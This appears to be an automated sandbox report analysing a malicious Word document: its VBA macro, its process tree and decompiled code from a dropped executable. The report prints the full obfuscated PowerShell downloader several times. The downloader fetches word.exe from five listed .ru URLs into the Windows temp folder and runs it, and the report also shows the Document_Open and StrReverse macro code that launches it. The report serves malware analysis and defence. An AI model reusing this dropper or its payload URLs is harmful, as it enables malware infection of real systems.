Mar 21, 2019 14:01:27.243365049 CET	15	IN	Data Raw: 74 24 10 8a d8 8b 44 24 2c 8b 48 04 8b 01 8b 40 10 ff d0 46 47 3a d8 75 19 8b 44 24 24 3b f5 75 bc 8b 4c 24 18 3b f8 5f 0f 44 ce 5e 5d 8b c1 5b 59 c3 8b 44 24 18 5f 5e 5d 5b 59 c3 cc 8b 4c 24 08 83 ec 38 53 55 8b 6c 24 54 56 8b f1 57 8b 7c 24 58 Data Ascii: t$D$,H@FG:uD$$;uL$;_D^][YD$_^][YL$8SUl$TVW\|$X;L$T0;)T$AL$PRT$D$D$dRT$ RP\|$(T$,L$uD$C8\|$r?B=r,D$A;+#Ql1
Mar 21, 2019 14:01:27.243391037 CET	16	IN	Data Raw: 8d 44 24 1c 50 e8 80 fb ff ff 83 c4 18 8b 00 89 06 8b c6 5e c3 ff 74 24 10 ff 74 24 1c ff 74 24 1c 50 ff 74 24 1c 8d 44 24 1c 50 e8 ca fc ff ff 83 c4 18 8b 00 89 06 8b c6 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 1c 8b 44 24 0c Data Ascii: D$P^t$t$t$Pt$D$P^L$D$Vt$t&t$t$t$Pt$D$P^t&t$t$t$Pt$D$P ^t$t$t$Pt$D$PZ^Ujh[C
Mar 21, 2019 14:01:27.243433952 CET	17	IN	Data Raw: 74 07 1b c0 83 c8 01 eb 02 33 c0 85 c0 75 30 8b 45 e0 3b c3 72 29 77 27 ff 75 10 8b 4d ec e8 04 52 00 00 8b 45 08 89 30 c6 40 04 00 8b 4d f4 64 89 0d 00 00 00 00 5f 5e 5b 8b e5 5d c2 0c 00 8b 5d ec 8b 7d e8 e9 2d ff ff ff c7 45 fc ff ff ff ff 8b Data Ascii: t3u0E;r)w'uMRE0@Md_^[]]}-E}};t!OH1N9VHNOHWCU;Cu9C\|#;u9AA;tCA@AEJEE8@Md_^[]uE
Mar 21, 2019 14:01:27.243475914 CET	18	IN	Data Raw: 6f 08 8b cd e8 2b d2 00 00 33 db 39 5e 68 76 61 33 ff 66 90 8b 4e 24 8b c3 c1 e8 05 8d 14 81 8b cb 83 e1 1f b8 01 00 00 00 d3 e0 85 02 8b 45 00 74 1a c6 44 07 08 01 8b 46 34 8b 4d 00 8b 04 d8 89 04 0f 8b 46 34 8b 44 d8 04 eb 11 c6 44 07 08 00 8b Data Ascii: o+39^hva3fN$EtDF4MF4DDMFPFPMCD;^hr\|$FLMFLG9GGGAG FP9G G$G(FPG,FP]G0[_^L$u2S$ppPAP$
Mar 21, 2019 14:01:27.243500948 CET	20	IN	Data Raw: 00 50 64 89 25 00 00 00 00 51 53 56 57 89 65 f0 c7 45 fc 00 00 00 00 8b 75 10 8b 7d 0c 8b 5d 08 90 85 ff 74 14 53 8b ce e8 04 03 00 00 4f 89 7d 0c 83 c3 08 89 5d 08 eb e8 c7 45 fc ff ff ff ff 8b 4d f4 64 89 0d 00 00 00 00 5f 5e 5b 8b e5 5d c3 6a Data Ascii: Pd%QSVWeEu}]tSO}]EMd_^[]jj;Ujh[CdPd%QSVWeEME@ttWfIMEEMd_^[]jj;Ujh[CdPd%QSVWeE
Mar 21, 2019 14:01:27.243525028 CET	21	IN	Data Raw: 8b cf e8 17 be 00 00 8b cf e8 30 ae 00 00 8b c7 5f 5e 5b 83 c4 08 c3 cc cc cc cc cc cc cc 55 8b ec 6a ff 68 10 5c 43 00 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 83 ec 1c 53 56 57 89 65 f0 33 f6 89 75 e8 32 db 88 5d ef 8b 7d 08 89 7d d8 8b 07 8b Data Ascii: 0_^[Ujh\CdPd%SVWe3u2]}}@L88tPjToEjMEE@L88EuuE;Eu]@L88vEqMyruEWPj
Mar 21, 2019 14:01:27.303745031 CET	22	IN	Data Raw: 74 2d 8b 74 24 10 8b ce 89 35 60 c7 44 00 8b 16 ff 52 04 56 e8 56 03 01 00 83 c4 04 8d 4c 24 18 e8 bb f9 00 00 5f 8b c6 5e 5d 5b 83 c4 18 c3 0f 57 c0 c7 44 24 1c b4 75 43 00 68 f8 6b 44 00 8d 44 24 20 66 0f d6 44 24 24 50 c7 44 24 28 c8 76 43 00 Data Ascii: t-t$5`DRVVL$_^][WD$uChkDD$ fD$$PD$(vC!2SUVWjL$=hDD\$u1WL$9=hDuHD@HDhDL$4=hDl$,M;ysA4ud3yt;xs@4uFtL$

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2296 Parent PID: 532

General

Start time:	14:00:47
Start date:	21/03/2019
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x2f420000
File size:	1423008 bytes
MD5 hash:	5D798FF0BE2A8970D932568068ACFD9D
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2876 Parent PID: 2296

General

Start time:	14:00:59
Start date:	21/03/2019
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	c:\\windows\\system32\\cmd /c set p=power&& set s=shell&& call %p%%s% $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \'000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\'.spl000it(\',\');$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \'c:\win000dows\tem000p\229.ex000e\';for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);
Imagebase:	0x4a220000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 1716 Parent PID: 2876

General

Start time:	14:01:00
Start date:	21/03/2019
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \'000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\'.spl000it(\',\');$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \'c:\win000dows\tem000p\229.ex000e\';for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);
Imagebase:	0x21e00000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: 229.exe PID: 2932 Parent PID: 1716

General

Start time:	14:01:10
Start date:	21/03/2019
Path:	C:\Windows\Temp\229.exe
Wow64 process (32bit):	false
Commandline:	'C:\windows\temp\229.exe'
Imagebase:	0x400000
File size:	548352 bytes
MD5 hash:	A76B7140CF6D5C4DC5E0ECFF23FC2CE0
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: IvHpl

Declaration

Line	Content
1	Attribute VB_Name = "IvHpl"

Executed Functions

Function pcbBtz, APIs: 2, Strings: 0, Number of lines: 7, Relevance: 7.507

APIs

Meta Information

Shell

Shell("c:\\windows\\system32\\cmd /c set p=power&& set s=shell&& call %p%%s% $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \"000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\".spl000it(\",\");$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \"c:\win000dows\tem000p\229.ex000e\";for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);",0) -> 2876

StrReverse

StrReverse(";)D5y43WFj$(xei;'' = pcHwi$;)fHEYP$ ,'000'(ecalper.'}}{hctac};kaerb;1mtAHdKsG$ ssec000orp-tr000ats;)1mtAHdKsG$ ,)(gnirt000SoT.VL4YJ$(eli000fda000oln000wod.Lk9VCk${yrt{)JBVHLiNei$ ni VL4YJ$(hcae000rof;"\e000xe.922\p000met\swod000niw\:c"\ = 1mtAHdKsG$;)63556 ,1(t000xen.Gkf1uNYRD$ = IWiH3E$;)"\,"\(ti000lps."\exe.drow/1hcraeSxaja/sj/hcraeSxaja/steppins/stessa/ur.gniddew-omsoc//:000p000t000t000h000,exe.drow/ur.ogtdns//:000p000t000t000h000,exe.drow/rf/nocixel/yrellag/stnenopmoc/eroc/ur.ksmewej//:s000p000t000t000h000,exe.drow/sroloc/stegdiw/reganamreganam/snigulp/stessa/ur.aklabyr-rotsorp//:000p000t000t000h000,exe.drow/sbatedih_mm/stegdiw/reganamreganam/snigulp/stessa/ur.lytsrats//:s000p000t000t000h000"\ = JBVHLiNei$;modnar tcejbo-wen = Gkf1uNYRD$;tneilc000bew.ten.met000sys tcejbo-wen = Lk9VCk$;ll000ehs.tpir000csw tce000jbo000moc- tce000jbo-wen = Ht8px$' = D5y43WFj$ %s%%p% llac &&llehs=s tes &&rewop=p tes c/ dmc\\23metsys\\swodniw\\:c") -> c:\\windows\\system32\\cmd /c set p=power&& set s=shell&& call %p%%s% $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \"000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\".spl000it(\",\");$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \"c:\win000dows\tem000p\229.ex000e\";for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);

Line	Instruction	Meta Information
6	Function pcbBtz(sYNoxQh, EzDka) as String
7	Dim UPQ2DvJWM as Boolean	executed
8	UPQ2DvJWM = False
9	Dim WLqv4a6J as Single
10	WLqv4a6J = 23197.750737484
11	pcbBtz = Shell(StrReverse(sYNoxQh), 0)	Shell("c:\\windows\\system32\\cmd /c set p=power&& set s=shell&& call %p%%s% $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \"000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\".spl000it(\",\");$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \"c:\win000dows\tem000p\229.ex000e\";for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);",0) -> 2876 StrReverse(";)D5y43WFj$(xei;'' = pcHwi$;)fHEYP$ ,'000'(ecalper.'}}{hctac};kaerb;1mtAHdKsG$ ssec000orp-tr000ats;)1mtAHdKsG$ ,)(gnirt000SoT.VL4YJ$(eli000fda000oln000wod.Lk9VCk${yrt{)JBVHLiNei$ ni VL4YJ$(hcae000rof;"\e000xe.922\p000met\swod000niw\:c"\ = 1mtAHdKsG$;)63556 ,1(t000xen.Gkf1uNYRD$ = IWiH3E$;)"\,"\(ti000lps."\exe.drow/1hcraeSxaja/sj/hcraeSxaja/steppins/stessa/ur.gniddew-omsoc//:000p000t000t000h000,exe.drow/ur.ogtdns//:000p000t000t000h000,exe.drow/rf/nocixel/yrellag/stnenopmoc/eroc/ur.ksmewej//:s000p000t000t000h000,exe.drow/sroloc/stegdiw/reganamreganam/snigulp/stessa/ur.aklabyr-rotsorp//:000p000t000t000h000,exe.drow/sbatedih_mm/stegdiw/reganamreganam/snigulp/stessa/ur.lytsrats//:s000p000t000t000h000"\ = JBVHLiNei$;modnar tcejbo-wen = Gkf1uNYRD$;tneilc000bew.ten.met000sys tcejbo-wen = Lk9VCk$;ll000ehs.tpir000csw tce000jbo000moc- tce000jbo-wen = Ht8px$' = D5y43WFj$ %s%%p% llac &&llehs=s tes &&rewop=p tes c/ dmc\\23metsys\\swodniw\\:c") -> c:\\windows\\system32\\cmd /c set p=power&& set s=shell&& call %p%%s% $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \"000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\".spl000it(\",\");$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \"c:\win000dows\tem000p\229.ex000e\";for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D); executed
12	End Function

Non-Executed Functions

Subroutine xDQze, APIs: 0, Strings: 0, Number of lines: 2, Relevance: 0.002

Line	Instruction	Meta Information
2	Sub xDQze()
3	End Sub

Subroutine V7LCHEVbx, APIs: 0, Strings: 0, Number of lines: 2, Relevance: 0.002

Line	Instruction	Meta Information
4	Sub V7LCHEVbx()
5	End Sub

Module: NexFaBP

Declaration

Line	Content
1	Attribute VB_Name = "NexFaBP"

Executed Functions

Subroutine i9900k, APIs: 2, Strings: 0, Number of lines: 13, Relevance: 2.513

APIs	Meta Information
Sgn
zGZ20tm8$

Line	Instruction	Meta Information
6	Public Sub i9900k()
7	Dim piy0w as Long	executed
8	piy0w = 0
9	Dim s4dUncq2 as Boolean
10	s4dUncq2 = False
11	Dim AWpR8M as Boolean
12	AWpR8M = True
13	Dim cDoNYM as Long
14	cDoNYM = Sgn(- 1578441454)	Sgn
15	Dim DAHsW4wge as Long
16	DAHsW4wge = - 335364396
17	zGZ20tm8$	zGZ20tm8$
18	End Sub

Non-Executed Functions

Subroutine zgedb5uE, APIs: 1, Strings: 0, Number of lines: 4, Relevance: 1.254

APIs	Meta Information
Fix

Line	Instruction	Meta Information
2	Sub zgedb5uE()
3	Dim Md53kf8 as Single
4	Md53kf8 = Fix(63298.888186878)	Fix
5	End Sub

Module: RCUzh

Declaration

Line	Content
1	Attribute VB_Name = "RCUzh"

Executed Functions

Function zGZ20tm8, APIs: 7, Strings: 1, Number of lines: 20, Relevance: 15.77

APIs	Meta Information
Sgn
Len	Len() -> 0
jhaGfR
monday
Sgn
Part of subcall function pcbBtz@IvHpl: Shell
Part of subcall function pcbBtz@IvHpl: StrReverse

Strings	Decrypted Strings
"&"

Line	Instruction	Meta Information
4	Public Function zGZ20tm8() as String
5	Dim PvWP6	executed
6	PvWP6 = "&"
7	Dim Mb0KC as Single
8	Mb0KC = Sgn(51873.055630678)	Sgn
9	Dim nuZzfEa8j as Object
10	Set nuZzfEa8j = New fm
11	Dim Vih9Ldw as Byte
12	Vih9Ldw = 63
13	Dim RDbFnvZl7 as String
14	Dim PnHE18cfu as String
15	PnHE18cfu = Len(jhaGfR)	Len() -> 0 jhaGfR executed
16	RDbFnvZl7 = nuZzfEa8j.monday.Text	monday
17	Dim oqEHOy2 as Long
18	oqEHOy2 = - 1101752412
19	Dim DxTqzWD as Double
20	DxTqzWD = Sgn(39646.160630077)	Sgn
21	RDbFnvZl7 = pcbBtz(RDbFnvZl7, 28928 / 113)
22	zGZ20tm8 = RDbFnvZl7
23	End Function

Non-Executed Functions

Subroutine PtNBJO8Yp, APIs: 0, Strings: 0, Number of lines: 2, Relevance: 0.002

Line	Instruction	Meta Information
2	Sub PtNBJO8Yp()
3	End Sub

Module: ThisDocument

Declaration

Line	Content
1	Attribute VB_Name = "ThisDocument"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True

Executed Functions

Subroutine Document_Open, APIs: 2, Strings: 0, Number of lines: 9, Relevance: 4.509

APIs	Meta Information
Part of subcall function i9900k@NexFaBP: Sgn
Part of subcall function i9900k@NexFaBP: zGZ20tm8$

Line	Instruction	Meta Information
10	Sub Document_Open()
13	Dim RgeJIsB as Byte	executed
14	RgeJIsB = 126
15	Dim q4H2mwp56 as Boolean
16	q4H2mwp56 = False
18	Dim v7bBxp as Byte
19	v7bBxp = 148
20	i9900k
21	End Sub

Module: fm

Declaration

Line	Content
1	Attribute VB_Name = "fm"
2	Attribute VB_Base = "0{38DFB29E-5608-4364-9A9B-0D444F94F45E}{023AECA8-FFDA-47EE-8FAE-2CF97F0B7C44}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = False
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = False

Reset < >

Analysis Process: 229.exe PID: 2932 Parent PID: 1716 229.exeUNIQUE

Executed Functions

Function 0040A4E1, Relevance: 106.1, APIs: 32, Strings: 28, Instructions: 1067
memorystringUNIQUE

Download Yara Rule

C-Code - Quality: 86%

			E0040A4E1(intOrPtr __ecx) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				short _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v100;
				WCHAR* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				long _v128;
				long _v132;
				char _v136;
				char _v140;
				char _v145;
				intOrPtr _v146;
				short _v147;
				intOrPtr _v148;
				intOrPtr _v150;
				intOrPtr _v151;
				intOrPtr _v152;
				intOrPtr _v154;
				intOrPtr _v155;
				intOrPtr _v156;
				intOrPtr _v158;
				intOrPtr _v159;
				intOrPtr _v160;
				intOrPtr _v162;
				intOrPtr _v163;
				intOrPtr _v164;
				intOrPtr _v166;
				intOrPtr _v167;
				intOrPtr _v168;
				intOrPtr _v170;
				intOrPtr _v171;
				intOrPtr _v172;
				intOrPtr _v174;
				intOrPtr _v175;
				intOrPtr _v176;
				intOrPtr _v178;
				intOrPtr _v179;
				intOrPtr _v180;
				intOrPtr _v182;
				intOrPtr _v183;
				intOrPtr _v184;
				intOrPtr _v186;
				intOrPtr _v187;
				char _v188;
				intOrPtr _v190;
				char _v191;
				intOrPtr _v192;
				short _v193;
				char _v196;
				intOrPtr _v197;
				intOrPtr _v200;
				intOrPtr _v201;
				intOrPtr _v204;
				intOrPtr _v205;
				char _v208;
				intOrPtr _v209;
				intOrPtr _v212;
				intOrPtr _v213;
				char _v214;
				char _v216;
				intOrPtr _v218;
				intOrPtr _v220;
				intOrPtr _v222;
				char _v224;
				intOrPtr _v226;
				char _v227;
				intOrPtr _v231;
				intOrPtr _v235;
				intOrPtr _v239;
				intOrPtr _v243;
				intOrPtr _v247;
				char _v248;
				intOrPtr _v252;
				char _v256;
				short _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				char _v376;
				intOrPtr _v380;
				char _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				char _v396;
				long _v400;
				long _v404;
				long _v408;
				char _v411;
				short _v414;
				intOrPtr _v415;
				intOrPtr _v418;
				intOrPtr _v419;
				intOrPtr _v422;
				intOrPtr _v423;
				intOrPtr _v426;
				char _v427;
				char _v428;
				short _v430;
				char _v431;
				char _v432;
				intOrPtr _v435;
				intOrPtr _v436;
				intOrPtr _v439;
				intOrPtr _v440;
				intOrPtr _v443;
				intOrPtr _v444;
				intOrPtr _v447;
				signed int _v448;
				short _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				intOrPtr _v476;
				intOrPtr _v480;
				intOrPtr _v484;
				char _v488;
				intOrPtr _v492;
				long _v496;
				intOrPtr _v500;
				char _v501;
				char _v502;
				short _v504;
				intOrPtr _v508;
				intOrPtr _v512;
				intOrPtr _v516;
				intOrPtr _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				char _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				char _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				char _v624;
				short _v628;
				short _v632;
				void* __ebx;
				void* __esi;
				void* _t573;
				intOrPtr _t581;
				char _t582;
				intOrPtr _t584;
				intOrPtr _t586;
				char _t587;
				intOrPtr _t591;
				WCHAR* _t593;
				short* _t594;
				short _t595;
				short _t596;
				signed int _t597;
				signed int _t600;
				intOrPtr* _t604;
				short _t606;
				intOrPtr* _t608;
				int _t611;
				intOrPtr* _t612;
				int _t619;
				int _t622;
				WCHAR* _t625;
				void* _t627;
				intOrPtr* _t629;
				void* _t640;
				long _t642;
				void* _t644;
				int _t651;
				intOrPtr* _t652;
				intOrPtr _t653;
				intOrPtr* _t662;
				WCHAR* _t665;
				signed int _t666;
				char* _t667;
				WCHAR* _t670;
				char _t671;
				void* _t673;
				void* _t676;
				void* _t678;
				void* _t685;
				WCHAR* _t687;
				long _t692;
				void* _t695;
				long _t696;
				void* _t702;
				char _t703;
				void* _t705;
				long _t708;
				WCHAR* _t710;
				void* _t712;
				void* _t715;
				WCHAR* _t719;
				void* _t721;
				intOrPtr* _t722;
				void* _t724;
				intOrPtr* _t725;
				intOrPtr _t727;
				intOrPtr _t729;
				void* _t730;
				short _t734;
				char _t773;
				intOrPtr _t786;
				WCHAR* _t803;
				void* _t812;
				long _t815;
				signed short _t817;
				signed int _t822;
				void* _t824;
				long _t828;
				WCHAR* _t832;
				void* _t836;
				WCHAR* _t838;
				void* _t840;
				void* _t843;
				void* _t844;
				void* _t847;
				void* _t848;
				void* _t849;
				void* _t850;
				void* _t851;
				void* _t853;

				_t727 = __ecx;
				_t573 = 0;
				_v500 = __ecx;
				if( *((intOrPtr*)(__ecx)) != 0) {
					_t724 = VirtualAlloc(0, 0x202, 0x3000, 4); // executed
					_t848 = _t724;
					_v104 = 0x100;
					 *(_t727 + 8) = _t848;
					_t725 = E004010BB(_t727, 5, 0xb9d41c39);
					 *_t725(_t848,  &_v104); // executed
					_t573 = 0;
				}
				if( *((intOrPtr*)(_t727 + 0xc)) != _t573) {
					_v104 = 0x1e;
					_t721 = VirtualAlloc(_t573, 0x20, 0x3000, 4); // executed
					_t847 = _t721;
					 *(_t727 + 0x14) = _t847;
					_t722 = E004010BB(_t727, 1, 0x3def91ac);
					 *_t722(_t847,  &_v104);
					_t573 = 0;
				}
				if( *((intOrPtr*)(_t727 + 0x18)) != _t573) {
					_t710 = VirtualAlloc(_t573, 0x80, 0x3000, 4); // executed
					 *(_t727 + 0x20) = _t710;
					_t859 = _t710;
					if(_t710 != 0) {
						_v384 = 0xb3b98470;
						_v380 = 0x76bbf839;
						_v376 = 0x62bce74;
						_v372 = 0x5bf6940a;
						_v368 = 0xa174d8a1;
						_v364 = 0xa174d8c7;
						_v360 = 0x7759eaad;
						_v356 = 0x66a503ce;
						_v352 = 0x2800431;
						_v348 = 0x4a7fbfd7;
						_v344 = 0xe796dfa2;
						_v340 = 0xb84625cc;
						_v336 = 0x384a6327;
						_v332 = 0xdff656a6;
						_v328 = 0x690ff5e4;
						_v324 = 0x594a62ff;
						_v320 = 0x82bd08d1;
						_v316 = 0xeee38067;
						_v312 = 0xe6f31be4;
						_v308 = 0xf29cd817;
						_v304 = 0x1c9befa1;
						_v300 = 0xa2df45f8;
						_v296 = 0xe8bdec82;
						_v292 = 0x644880d9;
						_v288 = 0x16399750;
						_v284 = 0x1845e3bc;
						_v280 = 0xf34fc983;
						_v276 = 0x77753fc9;
						_v272 = 0xa51a70fc;
						_v268 = 0x1a8bda0;
						_v264 = 0xb881055d;
						_v260 = 0x3969;
						_t712 = E00407563( &_v384);
						_v447 = 0xba6124e;
						_t817 = 0x5a;
						_v448 = _t817;
						_v443 = 0x7de9c51;
						_v439 = 0x68c28f2;
						_v435 = 0xb64856d9;
						_v431 = 0xb8651478;
						_v427 = 0x53651478;
						_v423 = 0xb369749d;
						_v419 = 0x54d04577;
						_v415 = 0x79e960c5;
						_v411 = 0x33;
						_t715 = E0040BACB(_t727, _t712, _t859, 0x80000002, _t712, E00407563( &_v448),  *(_t727 + 0x20), 0x80, 0); // executed
						_push( &_v48);
						if(_t715 == 0) {
							_v48 = 0x32fa3c4;
							_v44 = 0x1518ad8b;
							_v40 = 0x70779701;
							_v36 = 0xe66da3be;
							_v32 = 0x6b61fd16;
							_v28 = 0x6b61fd02;
							_v24 = 0x9acee05b;
							_v20 = 0x796145e8;
							_v16 = 0xcabac0c6;
							_v12 = 0xa2600093;
							_v8 = 0x45fc6bad;
							wsprintfW( *(_t727 + 0x20), E00407563());
							_t850 = _t850 + 0xc;
						} else {
							_v48 = 0xaa2450c0;
							_v44 = 0xa101e3b3;
							_v40 = 0x8680e9a9;
							_v36 = 0xccc53e10;
							_v32 = 0xdfc278ac;
							_v28 = 0xdfc278b8;
							_v24 = 0xbf9f5c2e;
							_v20 = 0x7e30115b;
